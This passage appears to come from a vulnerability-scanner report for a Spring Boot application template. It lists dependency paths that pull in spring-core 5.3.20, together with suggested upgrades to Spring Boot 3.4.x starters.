  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-devtools@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-devtools@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-devtools@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-devtools@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot-actuator@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework:spring-jdbc@5.3.22 org.springframework:spring-tx@7.0.0-M9 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-orm@7.0.0-M9 org.springframework:spring-tx@7.0.0-M9 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-orm@7.0.0-M9 org.springframework:spring-jdbc@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-devtools@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-devtools@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-devtools@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-devtools@3.4.10.
